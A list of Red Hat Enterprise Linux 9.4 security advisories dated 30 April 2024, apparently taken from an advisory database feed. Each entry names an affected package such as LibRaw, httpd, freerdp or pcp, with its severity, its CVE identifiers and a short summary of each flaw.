30.04.2024 03:00:00	redhat	[RHSA-2024:2137] LibRaw security update (low)	LibRaw is a library for reading RAW files obtained from digital photo cameras (CRW/CR2, NEF, RAF, DNG, and others).Security Fix(es):* LibRaw: a heap-buffer-overflow in raw2image_ex() (CVE-2023-1729)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2137
30.04.2024 03:00:00	redhat	[RHSA-2024:2146] libXpm security update (moderate)	X.Org X11 libXpm runtime library.Security Fix(es):* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2146
30.04.2024 03:00:00	redhat	[RHSA-2024:2147] ipa security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.Security Fix(es):* freeipa: specially crafted HTTP requests potentially lead to denial of service (CVE-2024-1481)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2147
30.04.2024 03:00:00	redhat	[RHSA-2024:2159] python3.11-urllib3 security update (moderate)	The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2159
30.04.2024 03:00:00	redhat	[RHSA-2024:2184] libsndfile security update (moderate)	libsndfile is a C library for reading and writing files containing sampled sound, such as AIFF, AU, or WAV. Security Fix(es):* libsndfile: integer overflow in src/mat4.c and src/au.c leads to DoS (CVE-2022-33065)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2184
30.04.2024 03:00:00	redhat	[RHSA-2024:2211] tcpdump security update (moderate)	The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.Security Fix(es):* tcpslice: use-after-free in extract_slice() (CVE-2021-41043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2211
30.04.2024 03:00:00	redhat	[RHSA-2024:2228] perl security update (moderate)	Perl is a high-level programming language that is commonly used for system administration utilities and web programming.Security Fix(es):* perl: Write past buffer end via illegal user-defined Unicode property (CVE-2023-47038)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2228
30.04.2024 03:00:00	redhat	[RHSA-2024:2239] skopeo security update (moderate)	The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2239
30.04.2024 03:00:00	redhat	[RHSA-2024:2246] ansible-core bug fix, enhancement, and security update (moderate)	Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically.Security Fix(es):* ansible-core: possible information leak in tasks that ignore ANSIBLE_NO_LOG configuration (CVE-2024-0690)Bug Fix(es):* Update ansible-core to 2.14.14 (JIRA:RHEL-23783)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2246
30.04.2024 03:00:00	redhat	[RHSA-2024:2276] qt5-qtbase security update (moderate)	Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es):* qt: incorrect integer overflow check (CVE-2023-51714)* qtbase: potential buffer overflow when reading KTX images (CVE-2024-25580)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2276
30.04.2024 03:00:00	redhat	[RHSA-2024:2278] httpd security update (moderate)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2278
30.04.2024 03:00:00	redhat	[RHSA-2024:2353] mingw components security update (moderate)	MinGW (Minimalist GNU for Windows) is a free and open source software development environment to create Microsoft Windows applications.Security Fix(es):* binutils: Heap-buffer-overflow binutils-gdb/bfd/libbfd.c in bfd_getl64 (CVE-2023-1579)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2353
30.04.2024 03:00:00	redhat	[RHSA-2024:2377] zziplib security update (moderate)	The zziplib is a lightweight library to easily extract data from zip files.Security Fix(es):* zziplib: invalid memory access at zzip_disk_entry_to_file_header in mmapped.c (CVE-2020-18770)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2377
30.04.2024 03:00:00	redhat	[RHSA-2024:2113] pcs security update (moderate)	The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.Security Fix(es):* rubygem-rack: Denial of Service Vulnerability in Rack Content-Type Parsing (CVE-2024-25126)* rubygem-rack: Possible DoS Vulnerability with Range Header in Rack (CVE-2024-26141)* rubygem-rack: Possible Denial of Service Vulnerability in Rack Header Parsing (CVE-2024-26146)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2113
30.04.2024 03:00:00	redhat	[RHSA-2024:2119] Image builder components bug fix, enhancement and security update (moderate)	Image Builder is a service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood.Security Fix(es):* osbuild-composer: race condition may disable GPG verification for package repositories (CVE-2024-2307)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2119
30.04.2024 03:00:00	redhat	[RHSA-2024:2126] webkit2gtk3 security update (important)	WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-40414)* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852)* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-23213)* webkitgtk: Processing a file may lead to a denial of service or potentially disclose memory contents (CVE-2014-1745)* webkitgtk: User password may be read aloud by a text-to-speech accessibility feature (CVE-2023-32359)* webkitgtk: use-after-free in the MediaRecorder API of the WebKit GStreamer-based ports (CVE-2023-39928)* webkitgtk: Processing web content may lead to a denial of service (CVE-2023-41983)* webkitgtk: processing a malicious image may lead to a denial of service (CVE-2023-42883)* webkitgtk: processing malicious web content may lead to arbitrary code execution (CVE-2023-42890)* webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-23206)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2126
30.04.2024 03:00:00	redhat	[RHSA-2024:2132] fence-agents security and bug fix update (moderate)	The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)* pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323)* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2132
30.04.2024 03:00:00	redhat	[RHSA-2024:2135] qemu-kvm security update (moderate)	Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* QEMU: e1000e: heap use-after-free in e1000e_write_packet_to_guest() (CVE-2023-3019)* QEMU: VNC: infinite loop in inflate_buffer() leads to denial of service (CVE-2023-3255)* QEMU: improper IDE controller reset can lead to MBR overwrite (CVE-2023-5088)* QEMU: VNC: NULL pointer dereference in qemu_clipboard_request() (CVE-2023-6683)* QEMU: am53c974: denial of service due to division by zero (CVE-2023-42467)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2135
30.04.2024 03:00:00	redhat	[RHSA-2024:2410] harfbuzz security update (moderate)	HarfBuzz is an implementation of the OpenType Layout engine.Security Fix(es):* harfbuzz: allows attackers to trigger O(n^2) growth via consecutive marks (CVE-2023-25193)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2410
30.04.2024 03:00:00	redhat	[RHSA-2024:2437] exfatprogs security update (moderate)	The exfatprogs package contains utilities for formatting and repairing exFAT filesystems.Security Fix(es):* exfatprogs: exfatprogs allows out-of-bounds memory access (CVE-2023-45897)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2437
30.04.2024 03:00:00	redhat	[RHSA-2024:2438] pam security update (moderate)	Pluggable Authentication Modules (PAM) provide a system to set up authentication policies without the need to recompile programs to handle authentication.Security Fix(es):* pam: allowing unprivileged user to block another user namespace (CVE-2024-22365)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2438
30.04.2024 03:00:00	redhat	[RHSA-2024:2145] libX11 security update (moderate)	The libX11 packages contain the core X11 protocol client library.Security Fix(es):* libX11: out-of-bounds memory access in _XkbReadKeySyms() (CVE-2023-43785)* libX11: stack exhaustion from infinite recursion in PutSubImage() (CVE-2023-43786)* libX11: integer overflow in XCreateImage() leading to a heap overflow (CVE-2023-43787)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2145
30.04.2024 03:00:00	redhat	[RHSA-2024:2156] frr security update (moderate)	FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es):* frr: incorrect length check in bgp_capability_llgr() can lead do DoS (CVE-2023-31489)* frr: missing length check in bgp_attr_psid_sub() can lead do DoS (CVE-2023-31490)* frr: processes invalid NLRIs if attribute length is zero (CVE-2023-41358)* frr: out of bounds read in bgp_attr_aigp_valid (CVE-2023-41359)* frr: NULL pointer dereference in bgp_nlri_parse_flowspec() in bgpd/bgp_flowspec.c (CVE-2023-41909)* frr: mishandled malformed data leading to a crash (CVE-2023-46752)* frr: crafted BGP UPDATE message leading to a crash (CVE-2023-46753)* frr: ahead-of-stream read of ORF header (CVE-2023-41360)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2156
30.04.2024 03:00:00	redhat	[RHSA-2024:2160] toolbox security update (moderate)	Toolbox is a tool for Linux operating systems, which allows the use of containerized command line environments. It is built on top of Podman and other standard container technologies from OCI.Security Fix(es):* golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318)* golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2160
30.04.2024 03:00:00	redhat	[RHSA-2024:2169] xorg-x11-server security update (moderate)	X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)* xorg-x11-server: SELinux context corruption (CVE-2024-0409)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)* xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2169
30.04.2024 03:00:00	redhat	[RHSA-2024:2170] xorg-x11-server-Xwayland security update (moderate)	Xwayland is an X server for running X clients under Wayland.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)* xorg-x11-server: SELinux context corruption (CVE-2024-0409)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2170
30.04.2024 03:00:00	redhat	[RHSA-2024:2483] traceroute security update (moderate)	The traceroute utility displays the route used by IP packets on their way to a specified network (or Internet) host.Security Fix(es):* traceroute: improper command line parsing (CVE-2023-46316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2483
30.04.2024 03:00:00	redhat	[RHSA-2024:2525] mingw-pixman security update (moderate)	Pixman is a pixel manipulation library for the X Window System and Cairo.Security Fix(es):* pixman: Integer overflow in pixman_sample_floor_y leading to heap out-of-bounds write (CVE-2022-44638)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2525
30.04.2024 03:00:00	redhat	[RHSA-2024:2180] runc security update (moderate)	The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.Security Fix(es):* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2180
30.04.2024 03:00:00	redhat	[RHSA-2024:2193] podman security update (moderate)	The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2193
30.04.2024 03:00:00	redhat	[RHSA-2024:2199] pmix security update (important)	The Process Management Interface (PMI) provides process management functions for MPI implementations. PMI Exascale (PMIx) provides an extended version of the PMI standard specifically designed to support clusters up to and including exascale sizes.Security Fix(es):* pmix: race condition allows attackers to obtain ownership of arbitrary files (CVE-2023-41915)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2199
30.04.2024 03:00:00	redhat	[RHSA-2024:2204] libnbd security update (moderate)	Network Block Device (NBD) is a protocol for accessing Block Devices (hard disks and disk-like devices) over a Network. The libnbd is a userspace client library for writing NBD clients.Security Fix(es):* libnbd: Malicious NBD server may crash libnbd (CVE-2023-5871)* libnbd: Crash or misbehaviour when NBD server returns an unexpected block size (CVE-2023-5215)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2204
30.04.2024 03:00:00	redhat	[RHSA-2024:2208] freerdp security update (moderate)	FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. The xfreerdp client can connect to RDP servers such as Microsoft Windows machines, xrdp, and VirtualBox.Security Fix(es):* freerdp: Incorrect offset calculation leading to DOS (CVE-2023-39350)* freerdp: Null Pointer Dereference leading DOS in RemoteFX (CVE-2023-39351)* freerdp: invalid offset validation leading to Out Of Bound Write (CVE-2023-39352)* freerdp: missing offset validation leading to Out-of-Bounds Read in gdi_multi_opaque_rect (CVE-2023-39356)* freerdp: Integer overflow leading to out-of-bound write vulnerability in gdi_CreateSurface (CVE-2023-40186)* freerdp: Out-of-bounds write in clear_decompress_bands_data (CVE-2023-40567)* freerdp: Out-of-bounds write in the `progressive_decompress` function due to incorrect calculations (CVE-2023-40569)* freerdp: buffer overflow in ncrush_decompress causes crash with crafted input (CVE-2023-40589)* freerdp: missing offset validation leading to Out Of Bound Read (CVE-2023-39353)* freerdp: Out-Of-Bounds Read in nsc_rle_decompress_data (CVE-2023-39354)* freerdp: integer-Underflow leading to Out-Of-Bound Read in zgfx_decompress_segment (CVE-2023-40181)* freerdp: Out-of-bounds read in general_LumaToYUV444 (CVE-2023-40188)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2208
30.04.2024 03:00:00	redhat	[RHSA-2024:2550] buildah bug fix update (moderate)	The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Bug Fix(es):* TRIAGE CVE-2024-24786 buildah: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON [rhel-9] RHEL9.4 0Day (JIRA:RHEL-28230)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2550
30.04.2024 03:00:00	redhat	[RHSA-2024:2559] python-jwcrypto security update (moderate)	The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.Security Fix(es):* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2559
30.04.2024 03:00:00	redhat	[RHSA-2024:2564] mod_http2 security update (moderate)	The mod_h2 Apache httpd module implements the HTTP2 protocol (h2+h2c) on top of libnghttp2 for httpd 2.4 servers.Security Fix(es):* mod_http2: httpd: CONTINUATION frames DoS (CVE-2024-27316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2564
30.04.2024 03:00:00	redhat	[RHSA-2024:2213] pcp security update (moderate)	Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: unsafe use of directories allows pcp to root privilege escalation (CVE-2023-6917)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2213
30.04.2024 03:00:00	redhat	[RHSA-2024:2217] motif security update (moderate)	The motif packages include the Motif shared libraries needed to run applications which are dynamically linked against Motif, as well as MWM, the Motif Window Manager.Security Fix(es):* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2217
30.04.2024 03:00:00	redhat	[RHSA-2024:2236] libvirt security update (moderate)	The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.Security Fix(es):* libvirt: NULL pointer dereference in udevConnectListAllInterfaces() (CVE-2024-2496)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2236
30.04.2024 03:00:00	redhat	[RHSA-2024:2245] buildah security update (moderate)	The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2245
30.04.2024 03:00:00	redhat	[RHSA-2024:2264] edk2 security update (important)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235)* EDK2: heap buffer overflow in Tcg2MeasureGptTable() (CVE-2022-36763)* EDK2: heap buffer overflow in Tcg2MeasurePeImage() (CVE-2022-36764)* edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message (CVE-2023-45229)* edk2: Out of Bounds read when handling a ND Redirect message with truncated options (CVE-2023-45231)* edk2: Infinite loop when parsing unknown options in the Destination Options header (CVE-2023-45232)* edk2: Infinite loop when parsing a PadN option in the Destination Options header (CVE-2023-45233)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2264
30.04.2024 03:00:00	redhat	[RHSA-2024:2565] libreswan security update (moderate)	Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: Missing PreSharedKey for connection can cause crash (CVE-2024-2357)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2565
30.04.2024 03:00:00	redhat	[RHSA-2024:2566] pcp security, bug fix, and enhancement update (important)	Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2566
